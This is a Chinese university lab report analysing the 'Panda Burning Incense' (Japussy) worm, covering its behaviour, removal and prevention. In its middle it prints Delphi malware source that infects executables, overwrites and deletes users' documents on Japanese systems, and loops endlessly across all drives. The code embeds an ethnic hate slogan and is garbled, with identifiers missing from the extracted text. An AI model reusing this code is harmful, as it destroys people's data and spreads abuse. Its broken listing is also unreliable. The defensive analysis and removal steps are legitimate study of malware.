信息安全-熊猫烧香病毒剖析.doc

《信息安全-熊猫烧香病毒剖析.doc》由会员分享，可在线阅读，更多相关《信息安全-熊猫烧香病毒剖析.doc（49页珍藏版）》请在咨信网上搜索。

1、网络攻击与防御实验报告计算机科学与技术学院计算机系网络教研室制课程名称：信息安全原理与实践实验名称：熊猫烧香病毒剖析实验成绩：实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。现将实验报告撰写的有关内容说明如下：1、实验报告模板为电子版。2、下载统一的实验报告模板，学生自行完成撰写和打印。报告的首页包含本次实验的一般信息：l l组 号：例如：2-5 表示第二班第5组。l l实验日期：例如：05-10-06 表示本次实验日期。(年-月-日)l l实验编号：例如：No.1 表示第一个实验

2、。l l实验时间：例如：2学时 表示本次实验所用的时间。实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。续页不再需要包含首页中的实验一般信息。3、实验报告正文部分具体要求如下：一、实验目的本次实验所涉及并要求掌握的知识点。二、实验环境实验所使用的设备名称及规格，网络管理工具简介、版本等。三、实验内容与实验要求实验内容、原理分析及具体实验要求。四、实验过程与分析根据具体实验，记录、整理相应命令、运行结果等，包括截图和文字说明。详细记录在实验过程中发生的故障和问题，并进行故障分析，说明故障排

3、除的过程及方法。五、实验结果总结对实验结果进行分析，完成思考题目，总结实验的心得体会，并提出实验的改进意见。六、附录 信息安全 熊猫烧香病毒剖析一、实验目的1）掌握熊猫烧香病毒的工作原理和感染方法；2）掌握手工清除熊猫病毒的基本方法。二、实验环境目标主机为windows-2003所用到的工具o Wsyscheck三、实验内容与实验要求蠕虫原理1）蠕虫定义 2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。 蠕虫病毒是自包含的程序(或是一

4、套程序)，它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。 请注意，与一般病毒不同，蠕虫不需要将其自身附着到宿主程序，有两种类型的蠕虫：主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中，并且使 用网络的连接仅将自身拷贝到其他的计算机中，主计算机蠕虫在将其自身的拷贝加入到另外的主机后，就会终止它自身(因此在任意给定的时刻，只有一个蠕虫的拷 贝运行)，这种蠕虫有时也叫野兔。 蠕虫一般不采取利用pe格式插入文件的方法，而是复制自身在互联网环境下进行传播，病毒的传染能力主要是针对计算机内的文件系统而言，而蠕虫病毒的传染目 标是互联网内的所有计算机。局域网条

5、件下的共享文件夹，电子邮件email，网络中的恶意网页，大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。 蠕虫和传统病毒的区别： 传统病毒主要攻击的是文件系统，在其传染的过程中，计算机使用者是传染的触发者，是传染的关键环节，使用者计算机知识水平的高低常常决定了传统病毒所能造成的破坏程度； 蠕虫主要是利用计算机系统漏洞进行传染，在搜索到网络中存在漏洞的计算机后，主动进行攻击。在传染的过程中，与计算机操作者是否进行操作无关，从而与使用者的计算机知识水平无关。2）蠕虫的基本程序结构 传播模块：负责蠕虫的传播，通过检查主机或远程计算机的地址库，找到可进一步传染的其他计算机。 隐藏模块：侵入主机后，隐

6、藏蠕虫程序，防止被用户发现。 目的功能模块：实现对计算机的控制、监视或破坏等功能。 传播模块由可以分为三个基本模块：扫描模块、攻击模块和复制模块。蠕虫程序功能模型也可以扩展为如下的形式：3）蠕虫程序的一般传播过程 扫描：由蠕虫的扫描功能模块负责探测存在漏洞的主机。当程序向某个主机发送探测漏洞的信息并收到成功的反馈信息后，就得到一个可传播的对象。 攻击：攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象，取得该主机的权限（一般为管理员权限），获得一个shell。 复制：复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。 蠕虫将自身复制到某台计算机之前，也会试图判断该计算机以前是都已被感

7、染过。在分布式系统中，蠕虫可能会以系统程序名或不易被操作系统察觉的名字来为自己 命名，从而伪装自己。同时，我们也可以看到，传播模块实现的实际上是自动入侵的功能。所以蠕虫的传播技术是蠕虫技术的首要技术，没有蠕虫的传播技术，也就 谈不上什么蠕虫技术了。“熊猫烧香”蠕虫病毒1）“熊猫烧香”档案 又名：尼亚姆、武汉男生、worm.whBoy、worm.nimaya 后又化身为：“金猪报喜” 病毒类型：蠕虫病毒 影响系统：Windows 9X/ME/NT/2000/XP/2003/Vista/72）“熊猫烧香”病毒特点 2006年底，我国互联网上大规模爆发“熊猫烧香”病毒及其变种，该病毒通过多种方式进行

8、传播，同时该病毒还具有盗取用户游戏账号、QQ账号等功能。该病 毒传播速度快，危害范围广，截至案发为止，已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏，引起社会各界高度关注。瑞星2006安全报告将 其列为十大病毒之首，在2006年度中国计算机病毒疫情和互联网安全报告的十大病毒排行中一举成为“毒王”。 “熊猫烧香”，是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会 删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改

9、成熊猫举着三根香的模样。“熊猫烧香”源码分析 含有病毒体的文件被运行后，病毒将自身复制至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该磁盘时激活病毒体。随后病毒体创建一个线程进行本地文件感染，同时创建另外一个线程连接网站下载DOS程序发 动恶意攻击。 下面，我们分析一下用delphi语言描述的“熊猫烧香”的主要源代码：program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI, Registry;constHeaderSize

10、 = 82432; /病毒体的大小IconOffset = $12EB8; /PE文件主图标的偏移量/查找2800000020的十六进制字符串可以找到主图/标的偏移量HeaderSize = 38912; /Upx压缩过病毒体的大小IconOffset = $92BC; /Upx压缩过PE文件主图标的偏移量/Upx 1.24W 用法: upx -9 -8086 Japussy.exeIconSize = $2E8; /PE文件主图标的大小-744字节IconTail = IconOffset + IconSize; /PE文件主图标的尾部ID = $44444444; /感染标记/垃圾码，以备

11、写入Catchword = If a race need to be killed out, it must be Yamato. +If a country need to be destroyed, it must be Japan! +* W32.Japussy.Worm.A *;$R *.RESfunction RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;stdcall; external Kernel32.dll;/函数声明varTmpFile: string;Si: STARTUPINFO;Pi: PR

12、OCESS_INFORMATION;IsJap: Boolean = False; /日文操作系统标记 =判断是否为Win9x= function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenExit;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then /Win9xResult := True;end;

13、=在流之间复制= procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos := Src.Position;dCurPos := Dst.Position;Src.Seek(sStartPos, 0);Dst.Seek(dStartPos, 0);Dst.CopyFrom(Src, Count);Src.Seek(sCurPos, 0);Dst.Seek(dCur

14、Pos, 0);end;=将宿主文件从已感染的PE文件中分离出来，以备使用= procedure Extract: string);varsStream, dStream: T;begintrysStream := T(ParamStr(0), fmOpenRead or fmShareDenyNone);trydStream := T(, fmCreate);trysStream.Seek(HeaderSize, 0); /跳过头部的病毒部分dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finallydStream.Free;end

15、;finallysStream.Free;end;exceptend;end;=填充STARTUPINFO结构= procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);beginSi.cb := SizeOf(Si);Si.lpReserved := nil;Si.lpDesktop := nil;Si.lpTitle := nil;Si.dwFlags := STARTF_USESHOWWINDOW;Si.wShowWindow := State;Si.cbReserved2 := 0;Si.lpReserved2 := ni

16、l;end;=发带毒邮件= procedure SendMail; /此处省略了带危害性代码beginend;=感染PE文件= procedure InfectOne: string);varHdrStream, SrcStream: T;IcoStream, DstStream: TMemoryStream;iID: LongInt;aIcon: TIcon;Infected, IsPE: Boolean;i: Integer;Buf: array0.1 of Char;begintry/出错则文件正在被使用，退出if CompareText(, JAPUSSY.EXE) = 0 then

17、/是自己则不感染Exit;Infected := False;IsPE := False;SrcStream := T(, fmOpenRead);tryfor i := 0 to $108 do/检查PE文件头beginSrcStream.Seek(i, soFromBeginning);SrcStream.Read(Buf, 2);if (Buf0 = #80) and (Buf1 = #69) then/PE标记beginIsPE := True; /是PE文件Break;end;end;SrcStream.Seek(-4, soFromEnd);/检查感染标记SrcStream.Rea

18、d(iID, 4);if (iID = ID) or (SrcStream.Size 10240) then /太小的文件不感染Infected := True;finallySrcStream.Free;end;if Infected or (not IsPE) then /如果感染过了或不是PE文件则退出Exit;IcoStream := TMemoryStream.Create;DstStream := TMemoryStream.Create;tryaIcon := TIcon.Create;try/得到被感染文件的主图标(744字节)，存入流aIcon.ReleaseHandle;a

19、Icon.Handle := ExtractIcon(HInstance, PChar(), 0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream := T(, fmOpenRead);/头文件HdrStream := T(ParamStr(0), fmOpenRead or fmShareDenyNone);try/写入病毒体主图标之前的数据CopyStream(HdrStream, 0, DstStream, 0, IconOffset);/写入目前程序的主图标CopyStream(IcoStream, 22, D

20、stStream, IconOffset, IconSize);/写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);/写入宿主程序CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);/写入已感染的标记DstStream.Seek(0, 2);iID := $44444444;DstStream.Write(iID, 4);finallyHdrStream.Free;end;fina

21、llySrcStream.Free;IcoStream.Free;DstStream.SaveTo); /替换宿主文件DstStream.Free;end;except;end;end;=将目标文件写入垃圾码后删除=procedure Smash: string);var: Integer;i, Size, Mass, Max, Len: Integer;begintrySet(PChar(), 0);/去掉只读属性 := (, fmOpenWrite); /打开文件trySize := Get(, nil);/文件大小i := 0;Randomize;Max := Random(15); /

22、写入垃圾码的随机次数if Max 5 thenMax := 5;Mass := Size div Max; /每个间隔块的大小Len := Length(Catchword);while i Max dobegin(, i * Mass, 0);/定位/写入垃圾码，将文件彻底破坏掉(, Catchword, Len);Inc(i);end;finally();/关闭文件end;Delete();/删除之exceptend;end;=获得可写的驱动器列表=function GetDrives: string;varDiskType: Word;D: Char;Str: string;i: Int

23、eger;beginfor i := 0 to 25 do /遍历26个字母beginD := Chr(i + 65);Str := D + :;DiskType := GetDriveType(PChar(Str);/得到本地磁盘和网络盘if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) thenResult := Result + D;end;end;=遍历目录，感染和摧毁文件=procedure LoopFiles(Path, Mask: string);vari, Count: Integer;Fn, Ext: string

24、;SubDir: TStrings;SearchRec: TSearchRec;Msg: TMsg;function IsValidDir(SearchRec: TSearchRec): Integer;beginif (SearchRec.Attr 16) and (SearchRec.Name .) and(SearchRec.Name .) thenResult := 0/不是目录else if (SearchRec.Attr = 16) and (SearchRec.Name .) and(SearchRec.Name .) thenResult := 1 /不是根目录else Res

25、ult := 2; /是根目录end;beginif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) thenbeginrepeatPeekMessage(Msg, 0, 0, 0, PM_REMOVE); /调整消息队列，避免引起怀疑if IsValidDir(SearchRec) = 0 thenbeginFn := Path + SearchRec.Name;Ext := UpperCase(Extract(Fn);if (Ext = .EXE) or (Ext = .SCR) thenbeginInfectOne);/感染可执行文件

26、endelse if (Ext = .HTM) or (Ext = .HTML) or (Ext = .ASP) thenbegin/感染HTML和ASP文件，将Base64编码后的病毒写入/感染浏览此网页的所有用户endelse if Ext = .WAB then /Outlook地址簿文件begin/获取Outlook邮件地址endelse if Ext = .ADC then /Foxmail地址自动完成文件begin/获取Foxmail邮件地址endelse if Ext = IND then /Foxmail地址簿文件begin/获取Foxmail邮件地址endelsebegini

27、f IsJap thenbeginif (Ext = .DOC) or (Ext = .XLS) or (Ext = .MDB) or(Ext = .MP3) or (Ext = .RM) or (Ext = .RA) or(Ext = .WMA) or (Ext = .ZIP) or (Ext = .RAR) or(Ext = .MPEG) or (Ext = .ASF) or (Ext = .JPG) or(Ext = .JPEG) or (Ext = .GIF) or (Ext = .SWF) or(Ext = .PDF) or (Ext = .CHM) or (Ext = .AVI)

28、thenSmash); /摧毁文件end;end;end;/感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑Sleep(200);until (FindNext(SearchRec) 0);end;FindClose(SearchRec);SubDir := TStringList.Create;if (FindFirst(Path + *.*, faDirectory, SearchRec) = 0) thenbeginrepeatif IsValidDir(SearchRec) = 1 thenSubDir.Add(SearchRec.Name);until (FindNe

29、xt(SearchRec) 0);end;FindClose(SearchRec);Count := SubDir.Count - 1;for i := 0 to Count doLoopFiles(Path + SubDir.Strings + , Mask);FreeAndNil(SubDir);end;/子过程是对典型遍历本机中所有可用盘中所有子目录下的所有子目录下的所有文件实施相应操作的编码。在确定当前文件为可执行文件（仅针对.exe和.scr文件）后，调用子过程InfectOneFile进行特定的感染。=遍历磁盘上所有的文件= procedure InfectFiles;varDri

30、verList: string;i, Len: Integer;beginif GetACP = 932 then/日文操作系统IsJap := True;DriverList := GetDrives;/得到可写的磁盘列表Len := Length(DriverList);while True do/死循环beginfor i := Len downto 1 do /遍历每个磁盘驱动器LoopFiles(DriverList + :, *.*);/感染之SendMail;/发带毒邮件Sleep(1000 * 60 * 5);/睡眠5分钟end;end;/ 核心是后面的死循环。先分析较简单的“

31、发带毒邮件”部分，从后面病毒具体遍历用磁盘并执行具体感染过程可知，在此过程中，它会取得安装在本机中的常用邮件 客户端程序（outlook，foxmail）相应电子邮件信息。其目的是，取得重要邮箱地址及相应密码，然后向这些邮件地址群发带毒的电子邮件，从而达 到利用网络传播自身的目的。=主程序开始=beginif IsWin9x then/是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) /注册为服务进程else/WinNTbegin/远程线程映射到Explorer进程end;/如果是原始病毒体自己if CompareText(Extract

32、(ParamStr(0), Japussy.exe) = 0 thenInfect感染和发邮件else /已寄生于宿主程序上了，开始工作beginTmp ParamStr(0); /创建临时文件Delete(TmpFile, Length(TmpFile) - 4, 4);Tmp TmpFile + #32 + .exe;/真正的宿主文件，多一个空格Extract);FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, ., Si, Pi)

33、;/创建新进程运行之InfectFiles; /感染和发邮件end;end.通过分析，不难绘出“熊猫烧香”病毒相应的执行流程，如下图所示。四、实验过程与分析“熊猫烧香”病毒主要行为分析 通过病毒分析实验室工具，对“熊猫烧香”病毒主要行为进行分析。在本次实验中，为了方便观察，运行“熊猫烧香”程序将不改变其他文件的图标。 1，我们打开桌面上的实验工具，找到熊猫烧香的病毒样本。如下图所示： 2，运行该程序，“熊猫烧香”病毒感染系统中的.exe、.com、.pif、.src、.html、.asp等文件，我们可以通过对“熊猫烧香”样本运行情况进行跟踪，打开HA_文件，可以先将文件保存为log文件，之后用

34、记事本打开查看，跟踪“熊猫烧香”病毒样本spcolsv.exe对系统文件修改的行为展示，如下图所示。 3，现在“熊猫烧香”已经彻底感染了这台电脑，我们下面观察一下，它会带来哪些症状。它尝试关闭多个安全软件，即天网防火墙进程、VirusScan网镖杀毒、金山毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Dubaesteemproces、绿鹰PC密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wrapped gift Killer、Winsock E

35、xpert、游戏木马检测大师、msctls_statusbar32、pjf(ustc)、IceSword等。 4，尝试结束安全软件相关进程，即Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.

36、kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe。我们打开桌面上“安装包”文件夹，找到瑞星的安装程序，尝试安装，会发现无法安装成功，如下图所示。 5，尝试打开任务管理器，我们发现任务管理器打开之后会迅速自动关闭。 6，点击菜单“开始”，选择“运行”，输入regedit，尝试打开注册表，会发现，注册表打开之后也迅速自动关闭。 7，打开“我的电脑”，双击本地磁盘C盘，会发现无法打开，同时，右键，会发现右键菜单中多了一个“Auto”选项。 8，打开菜单“工具”，打开“文件夹选项”，选择“显示所有文件和文件夹”，选择“确定”。如下图所示。 之后，

37、我们重新打开，查看刚才我们的修改是否成功，发现刚才的修改失败。如下图所示。 9，打开桌面上wsyscheck.exe，这是一款系统检测维护工具，可以进行进程和服务驱动的检查，SSDT强化检测，文件查询，注册表操作，DOS删除等操作。打开wsyscheck的进程管理，我们可以看见系统打开了哪些进程，我们可以看见spcolsv.exe正在运行，我们定位它的位置，可以发现，“熊猫烧香”已经将自身复制到了系统目录C:WINDOWSsystem32driversspcolsv.exe下，如下图所示。 10，我们继续打开“文件管理”框，在C盘下，我们可以看见隐藏了的“熊猫烧香”的安装程序setup.exe

38、以及autorun.inf文件。如下图所示。我们可以打开autorun.inf查看里面写入的内容，表明当双击C盘时，setup.exe将自动运行。 11，观察病毒创建启动项HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunsvcshare=% system32%driversspcolsv.exe情况，如下图所示。 12，病毒修改了注册表中“显示所有文件和文件夹”的设置内容：HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExploreAdvancedFolderH

39、idderSHOWALL分支下的“CheckedValue”的键值设为“dword：”。如下图所示。任务二实验步骤二“熊猫烧香”病毒手工清除 1，结束病毒进程。使用刚才介绍的工具wsyscheck，打开“进程管理”，找到spcolsv.exe，右键选择“结束进程并删除文件”。 2，删除根目录下的病毒文件： X:setup.exe X:autorun.inf 切换到“文件管理”，找到“熊猫烧香”的安装程序setup.exe，右键选择直接删除，同样直接删除该目录下的autorun.inf文件， 3，删除病毒启动项。切换到“注册表管理”，找到HKEY_CURRENT_USERSoftwareMicr

40、osoftWindowsCurrentVersionRunsvcshare，右键删掉该值。 4，恢复被修改的“显示所有文件和文件夹”设置。HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExploreAdvancedFolderHidderSHOWALL分支下的“CheckedValue”的键值设为“dword：”。 5，恢复或重新安装被破坏的软件。 6，通过上面的措施，接下来验证一下，现在能否打开任务管理器以及注册表，打开方式详见任务一。如下图所示，我们现在可以成功打开注册表和任务管理器。 7，接下来，清空回收站，我们打开我的电

41、脑，双击C盘，发现仍然不能打开，这个时候，需要重新启动计算机。 8，重启之后，我们右键C盘，发现仍然存在如下图所示的情况。这时，我们只需要按照步骤1至步骤4重新设置一遍，然后再一次重启。 9，再次重启之后，这个时候我们就可以打开C盘了。如下图所示。接下来我们就可以对系统重新安装杀毒软件，对系统进行全面的查杀。（桌面上NimayaKiller.scr是一款熊猫烧香的专杀工具，大家可以随时利用该工具清理电脑中的“熊猫烧香”病毒）五、实验结果总结实验结果截图以下为未感染病毒前的注册表及任务管理器感染病毒后无法安装瑞星杀毒软件任务管理器闪退C盘出现Auto，并无法打开任务管理器可以显示重启后发现C盘可

42、以打开，AUTO消失病毒删除成功，实验完成。心得体会如何防范“熊猫烧香”病毒？“熊猫烧香”病毒不但可以对用户系统进行破坏，导致大量应用软件无法使用，而且还可删除扩展名为gho的所有文件，造成用户的系统备份文件丢失，从而无法进行系统恢复；同时该病毒还能终止大量反病毒软件进程，大大降低用户系统的安全性。 这几天“熊猫烧香”的变种更是表象异常活跃，近半数的网民深受其害。对于已经感染“熊猫烧香”病毒的用户，建议参考熊猫烧香病毒专杀及手动修复方案，下载其中的专钉工具进行查杀，也可手动查杀。技术专家还总结了以下预防措施，帮你远离“熊猫烧香”病毒的骚扰。 1、立即检查本机administrator组成员口令

43、，一定放弃简单口令甚至空口令，安全的口令是字母数字特殊字符的组合，自己记得住，别让病毒猜到就行。 修改方法：右键单击“我的电脑”，选择管理，浏览到本地用户和组，在右边的窗中，选择具备管理员权限的用户名，单击右键，选择设置密码，输入新密码就行。 2.、利用组策略，关闭所有驱动器的自动播放功能。 步骤：单击开始，运行，输入gpedit.msc，打开组策略编辑器，浏览到计算机配置，管理模板，系统，在右边的窗格中选择关闭自动播放，该配置缺省是未配置，在下拉框中选择所有驱动器，再选取已启用，确定后关闭。最后，在开始，运行中输入gpupdate，确定后，该策略就生效了。 3、修改文件夹选项，以查看不明文件的真实属性，避免无意双击骗子程序中毒。 步骤：打开资源管理器（按windows徽标键E），点工具菜单下文件夹选项，再点查看，在高级设置中，选择查看所有文件，取消隐藏受保护的操作系统文件，取消隐藏文件扩展名。 4、时刻保持操作